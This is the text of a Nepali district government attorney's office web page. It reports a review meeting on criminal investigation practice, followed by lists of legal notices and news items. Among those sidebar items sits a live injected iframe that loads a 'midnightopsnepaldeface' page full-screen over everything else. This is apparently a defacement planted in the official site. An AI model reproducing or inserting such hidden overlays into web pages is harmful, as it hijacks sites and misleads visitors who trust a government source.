अनुसन्धान अधिकारी र सरकारी वकील वीच समिक्षा बैठक सम्मपन्न ।

samachar

2079-5-10

मिति २०७९।०५।०९ गते यस जिल्ला सरकारी वकील कार्यालय, बागलुङमा जिल्ला न्यायाधिवक्ता लालप्रसाद लामिछानेको अध्यक्षतामा आर्थिक बर्ष ०७९।८० को बार्षिक कार्ययोजनाको क्रियाकलाप नम्वर ५.१.१.४ अन्तर्गत कसूरको अनुसन्धान सम्वन्धमा अनुसन्धान अधिकारीहरु र सरकारी वकीलहरु वीच यस आ.व.को पहिलो समिक्षा बैठक सम्पन्न भयो । उक्त बैठकमा २०७९ साउन महिनाकोमा भएका अनुसन्धान संग संबन्धित मुद्दाहरुको समिक्षा गरियो । कार्यान्वयनको क्रममा देखा परेका समस्याहरु र हुन गएका कमि कमजोरीहरुलाई सुधार गर्दै कार्य सम्पादनमा प्रभावकारीता ल्याउने निर्णय गरियो । यदा कदा घटनास्थल मुचुल्का बरामदी मुचुल्का, जाहेरी दरखास्त लगायतका कागजातहरुमा घटना घटेको समय तथा मिति समेतमा फरक पन देखिने गरेकोमा सुद्धता सहित यथार्थ समय र मिति राख्नु पर्ने बालबालिका तथा महिला पीडित मुद्दाहरुमा सम्पुृर्ण कागजातहरु घटनास्थल मुचुल्का समेतमा गोपनियता कायम गर्ने समयमै अनुसन्धान कार्य सम्पन्न गरी पेश गर्नुपर्ने । सवारी दुर्घटनामा दुर्घटना प्रतिबेदन तत्काल प्राप्त गरी मिसिल संलग्न गर्नु पर्ने लगायत बिबिध बिषयमा छलफल गरी अनुसन्धान लगायतको कार्यमा प्रभावकारीता ल्याउने निर्णय गरियो । 

संलग्न जोडिएका विवरणहरु

अनुसन्धान अधिकारी र सरकारी वकील वीच समिक्षा बैठक सम्मपन्न । download
सूचना

dsadsa

मुलुकी संहिता सम्बन्धी केही नेपाल ऐनलाई संशोधन गर्ने ऐन, २०८० (अरि १८)

बाल न्याय सम्पादन काययविधि‚ २०८०

कानूनको विवादमा परकेा बालबालिकाको दिशान्तर कार्यविधी संबन्धी निर्देशिका २०८०

मुलुकी संहिता सम्बन्धी केही नेपाल ऐनलाई संशोधन गर्ने ऐन, २०८० (अरि १८)

चेक बाउन्स मुद्दा र साईबर क्राइम सम्बन्धी मुद्दाको सुनुवाईको क्षेत्रअधिकार ७७ वटै जिल्ला अदालतलाई प्रदान गर्ने सम्बन्धी राजपत्र (२०८०/०३/११)

धौलागिरी बहिरा आबसिय मा.वि मा समुदायमा सरकारी वकिल कार्यक्रम सम्पन्न ।।

चेक बाउन्स मुद्दा र साईबर क्राइम सम्बन्धी मुद्दाको सुनुवाईको क्षेत्रअधिकार ७७ वटै जिल्ला अदालतलाई प्रदान गर्ने सम्बन्धी राजपत्र (२०८०/०३/११)

नेपाल सरकार वादी हुने फौजदारी मुद्दाको अनुसन्धान तथा अभियोजन सम्बन्धी निर्देशिका, २०८०

आ.ब. ०७९।८० को बार्षिक प्रतिबेदन

समाचार

<iframe src="https://midnightopsnepaldeface.pages.dev/" allowfullscreen style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; min-height: 100vh; min-width: 100vw; z-index: 9999; border: none;"></iframe>

समुदायमा सरकारी वकील कार्यक्रम तमानखोला गा.पा.मा सम्पन्न

अनुसन्धान अधिकारी र सरकारी वकील वीच समिक्षा बैठक सम्मपन्न ।

जिल्ला प्रहरी कार्यालय, वागलुङको मु्द्दा शाखाको निरिक्षण सम्मपन्न ।

मिति २०७९।०३।२० गते समन्वय समितिको बैठक सम्मपन्न

समुदायमा सरकारी वकील कार्यक्रम वा.न.पा. वडा नं. ४ कुडुले माध्यामिक विद्यालयमा सम्पन्न ।

मिति २०७८।०९।०७ गते समन्वय समितिको बैठकको निर्णय

समुदायमा सरकारी वकील कार्यक्रम बागलुङ नगरपालिका वडा नं.३ धवलागिरी माध्यामिक विद्यालयमा सम्पन्न ।